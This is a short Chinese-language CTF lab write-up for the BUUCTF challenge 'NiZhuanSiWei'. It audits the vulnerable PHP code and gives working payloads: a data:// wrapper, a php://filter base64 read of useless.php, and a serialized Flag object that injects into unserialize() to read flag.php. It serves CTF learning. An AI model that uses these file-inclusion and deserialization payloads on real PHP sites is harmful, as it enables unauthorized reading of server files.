BUUCTF[ZJCTF 2019]NiZhuanSiWei 1
开启靶场,发现PHP代码,进行代码审计。
<?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_match("/flag/",$file)){ echo "Not now!"; exit(); }else{ include($file); //useless.php $password = unserialize($password); echo $password; } } else{ highlight_file(__FILE__); } ?>
1,发现要用get方式传入text,file,password三个变量
isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf" “text” 的内容以确定,为"welcome to the zjctf",尝试本地创建一个文件,进行上传。但发现不行。
看了WP,发现data可以,payload: ?text=data://text/plain,welcome to the zjctf
data的用法:
(1)data://text/plain;base64,+(内容的base64加密值)
(2),data://text/plain,(+原内容)
2,构造file函数,之前的代码提示了useless.php 文件,使用filter 协议读取文件
payload: file:file=php://filter/read=convert.base64-encode/resource=useless.php
解码得到PHP代码
<?php class Flag{ //flag.php public $file; public function __tostring(){ //__toString(),类被当成字符串时的回应方法 if(isset($this->file)){ echo file_get_contents($this->file); //file_get_contents() 函数把整个文件读入一个字符串中。 echo "<br>"; return ("U R SO CLOSE !///COME ON PLZ"); } } } ?>
3,给file赋值为flag.php,因为第一个PHP代码会将password进行一次反序列化,所以在这对password进行序列化输出
4,构造payload: password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
最终payload:?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
5,访问源码,发现flag
得到flag